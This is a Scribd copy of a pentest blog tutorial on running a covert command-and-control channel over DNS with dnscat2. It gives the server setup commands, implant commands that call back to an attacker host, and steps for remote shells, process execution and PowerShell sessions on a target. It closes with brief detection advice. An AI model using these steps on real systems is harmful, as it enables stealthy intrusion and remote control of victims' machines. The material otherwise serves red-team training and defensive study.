Scribd
Upload
18 views

Command and Control - DNS

This document discusses using DNS traffic as a covert channel for command and control (C&C) between an attacker's server and a target host. It describes using the dnscat2 tool to create an encrypted C&C tunnel over DNS that is difficult to detect. The document provides instructions for installing dnscat2 on Kali Linux and using it to set up a C&C server. It also explains how to download a Windows client binary that can connect to the server by specifying its DNS address, thus establishing a C&C channel.

Uploaded by

brunodiaz2038
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
18 views

Command and Control - DNS

This document discusses using DNS traffic as a covert channel for command and control (C&C) between an attacker's server and a target host. It describes using the dnscat2 tool to create an encrypted C&C tunnel over DNS that is difficult to detect. The document provides instructions for installing dnscat2 on Kali Linux and using it to set up a C&C server. It also explains how to download a Windows client binary that can connect to the server by specifying its DNS address, thus establishing a C&C channel.

Uploaded by

brunodiaz2038
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Penetration Testing Lab

Articles from the Pentesting Field

Home Pentesting Distros Resources Submissions Toolkit Contact the Lab

Command and Control – Windows COM Search the Lab


Search...
Command and Control – WebDAV

Author
September Command and Control – DNS
6, 2017
netbiosX Red Team C&C, C2, Command and Control, DNS, dnscat2, PowerShell
Red Team 1 Comment
netbiosX

Even in the most restricted environments DNS traffic should be allowed to resolve internal
or external domains. This can be used as a communication channel between a target host Follow PenTest Lab
and the command and control server. Commands and data are included inside DNS
queries and responses therefore detection is difficult since arbitrary commands are hiding Enter your email address to follow this blog and
in legitimate traffic. receive notifications of new posts by email.

Implementation of this technique is possible with the use of Dnscat2 which can create a Join 1,667 other followers
command and control channel over the DNS protocol. This tool uses a client (implant)
which is based in C and it needs to be executed on the target in order for the server to Enter your email address
receive a connection. Traffic is transmitted in an encrypted form and also it supports
Follow
authentication via pre-shared secrets.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Installation of this tool is easy by following the commands below from a Kali Linux 2.0 Recent Posts
machine.
Command and Control – Browser
1 git clone https://github.com/iagox86/dnscat2.git
2 cd dnscat2/server/ SPN Discovery
3 bundle install Situational Awareness
Lateral Movement – WinRM
AppLocker Bypass – CMSTP

Categories
Coding (10)
Defense Evasion (20)
Exploitation Techniques (19)
External Submissions (3)
General Lab Notes (21)
Information Gathering (12)
Infrastructure (2)
Maintaining Access (4)
Mobile Pentesting (7)
Network Mapping (1)
Dnscat2 – Download and Installation Post Exploitation (12)
Privilege Escalation (14)
The command and control server can initiated by using the following command.
Red Team (27)
1 ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.1.169" Social Engineering (11)
Tools (7)
VoIP (4)
Web Application (14)
Wireless (2)

Archives

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
June 2018
May 2018
April 2018
January 2018
December 2017
November 2017
October 2017
September 2017
August 2017
July 2017
June 2017
May 2017
April 2017
Dnscat2 – Server
March 2017
February 2017
A compiled version of the client (implant) for Windows systems can be downloaded directly
from here. From the command prompt of the target the only requirement is to specify the January 2017

DNS server in order to establish a connection with the C2 (Command & Control) server. November 2016
September 2016
1 dnscat2-v0.07-client-win32.exe --dns server=192.168.1.169
February 2015
January 2015
July 2014
April 2014
June 2013
May 2013
April 2013
March 2013
February 2013
Dnscat2 – Windows Client
January 2013

From Dnscat2 the red teamer can start the interaction with the existing session that has December 2012
been created: November 2012
October 2012

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1 session -i 1 September 2012
August 2012
July 2012
June 2012
April 2012
March 2012
February 2012

@ Twitter
#BSidesLDN2018 was great so far! Many thanks to
Dnscat2 – Interactive Session @dradisfw for the ticket #dradis #greatproduct
6 hours ago
By executing “help” a list of available commands for usage can be retrieved: Great talk by @john_shier about Dark Web!
#BSidesLDN2018 https://t.co/1yC8lVKn3X
7 hours ago
RT @myexploit2600: I be talking at 14:00 in track 2
@BSidesLondon #BsidesLDN2018 7 hours ago
Finally a social engineering talk #BSidesLDN2018
https://t.co/jMMk4lvbcH 7 hours ago
[New Post] Command and Control - Browser
pentestlab.blog/2018/06/06/com… #pentestlab
#Redteam 9 hours ago

Follow @netbiosX

Pen Test Lab Stats


3,030,655 hits

Dnscat2 – List of Commands Blogroll

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Part of the functionality of dnscat2 is to upload and download files, execute other programs Packetstorm Exploits,Advisories,Tools,Whitepapers
and obtaining a remote shell. 0
Metasploit Latest news about Metasploit Framework
Obtaining a shell is easy with the “shell” command which will open another session: and tutorials 0
0x191unauthorized Tutorials 0
The home of WeBaCoo Information about the
WeBaCoo and other tutorials 0
Command Line Kung Fu Command Line Tips and
Tricks 0

Dnscat2 – Shell
Exploit Databases
The following output will appear on the command prompt of the target:
Exploit Database Exploits,PoC,Shellcodes,Papers
0
Metasploit Database Exploit & Auxiliary Modules 0
Inj3ct0r Database Remote,Local,Web
Apps,Shellcode,PoC 0

Pentest Blogs
Dnscat2 – Command Shell Request Carnal0wnage Ethical Hacking Tutorials 0
Coresec Pentest tutorials,Code,Tools 0
The shell will be interactive and fast and all the commands will be transferred over DNS Notsosecure From Pentesters To Pentesters 0
traffic:
Pentestmonkey Cheatsheets,Tools and SQL
Injection 0
Pentester Web Application Testing,Tips,Testing
Tools 0
Packetstorm Exploit Files 0
room362 Blatherings of a Security Addict 0
darkoperator Shell is only the Beginning 0
Irongeek Hacking Videos,Infosec Articles,Scripts 0

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Professional
The Official Social Engineering Portal Information
about the Social Engineering Framework,Podcasts
and Resources 0

Next Conference

Security B-Sides London


April 29th, 2014

The big day is here.

Facebook Page

Dnscat2 – Executing Shell Commands


Penetrati…
9.9K likes
Launching another program remotely is possible by calling the executable:

1 exec notepad.exe

Like Page

Be the first of your friends to


like this

Dnscat2 – Start New Process

Luke Baggett developed a PowerShell version of the implant which have been introduced
and described in the blackhillsinfosec website. The commands are the same but additional

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
features have been added like interactive PowerShell session and ability to run scripts Advertisements

directly from memory.

The following command needs to be executed from a PowerShell session on the target:

1 PS C:\> start-Dnscat2 -Domain pentestlab -DNSServer 192.168.1

It is also possible to establish a direct PowerShell session by running the following:

1 exec psh

Dnscat2 – PowerShell

A new console will created with the ability to execute PowerShell commands and scripts:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Dnscat2 – PowerShell Command

Conclusion
There are various advantages of command and control over DNS with dnscat2. Some of
them are:

Support of multiple sessions


Traffic encryption
Protection from MiTM attacks with secret key

Run PowerShell scripts directly from memory


Stealthy

Since detection is difficult due to the fact that arbitrary commands are transferred behind
legitimate DNS traffic emphasis should be given to monitor the length of DNS queries and
to allow hosts to communicate only with DNS servers that are trusted.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
References
https://github.com/iagox86/dnscat2

https://github.com/lukebaggett/dnscat2-powershell

https://www.blackhillsinfosec.com/powershell-dns-command-control-with-dnscat2-
powershell/

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Advertisements

Rate this:

1 Vote

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Share this:

 Twitter  Facebook 100  LinkedIn  Pinterest

 Reddit  Tumblr  Google

Like
Be the first to like this.

Related

Command and Control - Lateral Movement - Command and Control -


Browser WinRM DropBox
In "Red Team" In "Red Team" In "Red Team"

1 Comment (+add yours?)

Ogia
Sep 06, 2017 @ 07:22:59

great stuff!! keep up with this good work you do!

REPLY

Leave a Reply

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Enter your comment here...

Command and Control – Windows COM

Command and Control – WebDAV

Blog at WordPress.com.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like